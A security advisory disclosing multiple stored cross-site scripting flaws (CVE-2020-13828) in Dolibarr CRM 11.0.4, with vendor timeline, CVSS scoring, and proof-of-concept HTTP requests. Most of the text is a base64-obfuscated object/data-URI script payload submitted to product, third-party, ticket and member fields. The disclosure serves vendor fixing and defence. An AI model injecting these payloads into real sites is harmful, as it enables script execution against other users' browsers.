Security Research & Advisories

Multiple Stored Cross-Site Scripting Vulnerabilities in Dolibarr CRM

Vendor
Product Dolibarr
Affected Version(s) 11.0.4 and probably prior
Tested Version(s) 11.0.4
Vendor Notification May 27, 2020
Advisory Publication May 27, 2020 [without technical details]
Vendor Fix Version 11.0.5
Public Disclosure August 25, 2020
Latest Modification August 25, 2020
CVE Identifier(s) CVE-2020-13828
Product Description Dolibarr ERP/CRM is an open source, free software package for small and medium companies, foundations or freelancers. It includes different features for enterprise resource planning (ERP) and customer relationship management (CRM) but also other features for different activities.
Credits Luis Noriega, Security Researcher & Penetration Tester @wizlynx group

Vulnerability Details

Stored Cross-Site Scripting (XSS) Vulnerability
Severity: Medium CVSS Score: 6.1 CWE-ID: CWE-79 Status: Not Fixed
Vulnerability Description
The application Dolibarr CRM is affected by multiple stored Cross-Site Scripting (XSS) vulnerabilities affecting version 11.0.4 and probably prior versions. These vulnerabilities could allow remote authenticated attackers to inject arbitrary web script or HTML.
CVSS Base Score
Attack Vector Network Scope Changed
Attack Complexity Low Confidentiality Impact Low
Privileges Required None Integrity Impact Low
User Interaction Required Availability Impact None

Description

Dolibarr has multiple stored Cross-Site Scripting (XSS) vulnerabilities due to the lack of input validation and output encoding.

PoC

Example #1

The following payload was successfully submitted to the server in the label parameter:

<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgiQG5vZ2FnbXgiKTwvc2NyaXB0Pg=='></object>

This input was echoed unmodified in the application's response resulting in a Cross-Site Scripting (see request below).

POST /dolibarr/product/card.php?id=2 HTTP/1.1

token=%242y%2410%24A.bF3SJr4WvTRsxUfLwnEemzTF68V3mEfgYBJeYSs2%2FRQBB3JvWFy&action=update&id=2&canvas=&ref=123455667&label=%3Cobject+data%3D%27data%3Atext%2Fhtml%3B%3B%3B%3B%3Bbase64%2CPHNjcmlwdD5hbGVydCgiQG5vZ2FnbXgiKTwvc2NyaXB0Pg%3D%3D%27%3E%3C%2Fobject%3E&statut=1&statut_buy=1&barcode=&desc=%3Cbr+%2F%3E%0D%0A%3Cbr+%2F%3E%0D%0A%26nbsp%3B&url=&finished=-1&weight=&weight_units=0&size=&sizewidth=&sizeheight=&size_units=0&surface=&surface_units=0&volume=&volume_units=0&customcode=&country_id=&accountancy_code_sell=&accountancy_code_sell_export=&accountancy_code_buy=

Payload:

<object+data ='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgiQG5vZ2FnbXgiKTwvc2NyaXB0Pg=='></object>

Where:
“PHNjcmlwdD5hbGVydCgiQG5vZ2FnbXgiKTwvc2NyaXB0Pg==” = <script>alert("@nogagmx")</script>

The following screenshot shows both the request and response:

The following screenshot shows the JavaScript being executed on the client side:

Example #2

Additionally, it was possible to inject our malicious payload in the name_alias parameter (Third-party Section) as shown in the following request:

POST /dolibarr/societe/card.php?socid=4 HTTP/1.1


-----------------------------5276315661579106896916459915
Content-Disposition: form-data; name="name"

test xss
-----------------------------5276315661579106896916459915
Content-Disposition: form-data; name="name_alias"

<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgiQG5vZ2FnbXgiKTwvc2NyaXB0Pg=='></object>

The following screenshot shows both the request and response:

After following the redirection, the payload is shown in the application response without any codification.

The following screenshot shows the JavaScript being executed on the client side:

Other affected pages & parameters:

customcode parameter – Product Section

POST /dolibarr/product/card.php?id=2 HTTP/1.1

token=%242y%2410%24A.bF3SJr4WvTRsxUfLwnEemzTF68V3mEfgYBJeYSs2%2FRQBB3JvWFy&action=update&id=2&canvas=&ref=123455667&label=test&statut=1&statut_buy=1&barcode=&desc=%3Cbr+%2F%3E%0D%0A%3Cbr+%2F%3E%0D%0A%26nbsp%3B&url=&finished=-1&weight=&weight_units=0&size=&sizewidth=&sizeheight=&size_units=0&surface=&surface_units=0&volume=&volume_units=0&customcode=%3Cobject+data%3D%27data%3Atext%2Fhtml%3B%3B%3B%3B%3Bbase64%2CPHNjcmlwdD5hbGVydCgiQG5vZ2FnbXgiKTwvc2NyaXB0Pg%3D%3D%27%3E%3C%2Fobject%3E&country_id=&accountancy_code_sell=&accountancy_code_sell_export=&accountancy_code_buy=

subject parameter – Ticket Section

POST /dolibarr/ticket/card.php?action=create&idmenu=21&mainmenu=ticket&leftmenu= HTTP/1.1

-----------------------------1968352102747999012167307275
Content-Disposition: form-data; name="category_code"

OTHER
-----------------------------1968352102747999012167307275
Content-Disposition: form-data; name="subject"

<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgiQG5vZ2FnbXgiKTwvc2NyaXB0Pg=='></object>
-----------------------------1968352102747999012167307275
Content-Disposition: form-data; name="message"

societe parameter – Member Section

POST /dolibarr/adherents/card.php HTTP/1.1

Content-Disposition: form-data; name="morphy"

phy
-----------------------------20235881561969443630462327924
Content-Disposition: form-data; name="typeid"

1
-----------------------------20235881561969443630462327924
Content-Disposition: form-data; name="societe"
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgiQG5vZ2FnbXgiKTwvc2NyaXB0Pg=='></object>

address parameter – Member Section

POST /dolibarr/adherents/card.php HTTP/1.1

Content-Disposition: form-data; name="member_email"

-----------------------------1029758512301943784456065998
Content-Disposition: form-data; name="address"

<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgiQG5vZ2FnbXgiKTwvc2NyaXB0Pg=='></object>

message parameter – Ticket Section

POST /dolibarr/ticket/card.php?action=create&idmenu=21&mainmenu=ticket&leftmenu= HTTP/1.1

-----------------------------1366952982792511851202536362
Content-Disposition: form-data; name="subject"

dfdfdfdfdfdfd
-----------------------------1366952982792511851202536362
Content-Disposition: form-data; name="message"

<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgiQG5vZ2FnbXgiKTwvc2NyaXB0Pg=='></object>

barcode parameter – Third-party Section

POST /dolibarr/societe/card.php?socid=5 HTTP/1.1

Content-Disposition: form-data; name="barcode"

<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgiQG5vZ2FnbXgiKTwvc2NyaXB0Pg=='></object>
-----------------------------1613565241541576224808100738
Content-Disposition: form-data; name="status"

open

address parameter – Third-party Section

POST /dolibarr/societe/card.php?socid=5 HTTP/1.1

Content-Disposition: form-data; name="address"

<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgiQG5vZ2FnbXgiKTwvc2NyaXB0Pg=='></object>
-----------------------------1613565241541576224808100738
Content-Disposition: form-data; name="zipcode"

-----------------------------1613565241541576224808100738

Top